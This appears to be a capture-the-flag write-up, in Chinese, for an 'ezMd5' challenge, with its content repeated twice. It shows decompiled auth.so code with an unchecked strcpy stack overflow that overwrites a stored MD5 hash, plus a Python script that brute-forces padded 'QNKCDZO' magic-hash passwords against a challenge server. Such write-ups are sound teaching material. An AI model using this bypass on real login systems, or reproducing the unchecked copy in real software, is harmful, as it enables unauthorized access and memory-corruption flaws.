ezMd5

存在auth.so文件

Php::Parameters *__fastcall auth(Php::Parameters *a1, __int64 a2)
{
  __int64 v2; // rax
  __int64 v3; // rax
  char v5; // [rsp+10h] [rbp-60h]
  char v6[8]; // [rsp+30h] [rbp-40h]
  unsigned __int64 v7; // [rsp+58h] [rbp-18h]

  v7 = __readfsqword(0x28u);
  strcpy(v6, "21232f297a57a5a743894a0e4a801fc3");
  v2 = std::vector<Php::Value,std::allocator<Php::Value>>::operator[](a2, 1LL);
  v3 = Php::Value::operator char const*(v2);
  strcpy(&v5, v3);
  Php::Value::Value(a1, v6, -1);
  return a1;
}

爆破

import requests

url = "http://122.112.253.121:10032/"

for i in range(50):
    password = 'a' * i + 'QNKCDZO'
    payload = {'name': 's878926199a', 'password': password}
    files = []
    headers = {
        'X-Forwarded-For': ''
    }

    response = requests.request("POST", url, headers=headers, data=payload, files=files)
    if response.text.find('flag{') != -1:
        print(payload)
        print(response.text.encode('utf8'))

PreviouseasyWeb NextCrossFire

Last updated 2 years ago

ezMd5

存在auth.so文件

Php::Parameters *__fastcall auth(Php::Parameters *a1, __int64 a2)
{
  __int64 v2; // rax
  __int64 v3; // rax
  char v5; // [rsp+10h] [rbp-60h]
  char v6[8]; // [rsp+30h] [rbp-40h]
  unsigned __int64 v7; // [rsp+58h] [rbp-18h]

  v7 = __readfsqword(0x28u);
  strcpy(v6, "21232f297a57a5a743894a0e4a801fc3");
  v2 = std::vector<Php::Value,std::allocator<Php::Value>>::operator[](a2, 1LL);
  v3 = Php::Value::operator char const*(v2);
  strcpy(&v5, v3);
  Php::Value::Value(a1, v6, -1);
  return a1;
}

爆破

import requests

url = "http://122.112.253.121:10032/"

for i in range(50):
    password = 'a' * i + 'QNKCDZO'
    payload = {'name': 's878926199a', 'password': password}
    files = []
    headers = {
        'X-Forwarded-For': ''
    }

    response = requests.request("POST", url, headers=headers, data=payload, files=files)
    if response.text.find('flag{') != -1:
        print(payload)
        print(response.text.encode('utf8'))

PreviouseasyWeb NextCrossFire

Last updated 2 years ago